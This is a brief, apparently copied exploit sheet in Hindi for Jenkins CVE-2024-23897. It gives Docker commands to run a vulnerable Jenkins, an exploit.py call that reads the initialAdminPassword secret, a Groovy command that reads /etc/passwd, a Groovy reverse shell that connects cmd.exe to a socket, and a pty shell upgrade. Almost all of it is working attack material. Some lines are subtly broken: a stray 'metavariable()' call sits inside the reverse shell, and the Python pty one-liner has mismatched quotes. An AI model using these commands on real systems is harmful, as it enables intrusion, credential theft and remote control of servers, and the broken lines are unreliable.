
CVE-2024-23897 के लिए Jenkins में शोषण, जो तैयार किए गए अनुरोधों के माध्यम से फ़ाइल पढ़ने और रिमोट कोड निष्पादन को सक्षम करता है। इसमें RCE के लिए Docker सेटअप और Groovy स्क्रिप्ट शामिल हैं।
docker run -p 8080:8080 --name vulnerable-jenkins -d jenkins/jenkins:2.441-jdk17
docker logs <machine_name>
docker inspect vulnerable-jenkins | grep IPAddress
#शोषण कोड: python3 exploit.py --target http://127.0.0.1:8080 --file /var/jenkins_home/secrets/initialAdminPassword --request-timeout 30
println "cat /etc/passwd".execute().text
String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(metavariable()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
export TERM=xterm
#इंटरैक्टिव शेल के लिए
python -c 'import pty'; pty.spawn("/bin/bash")'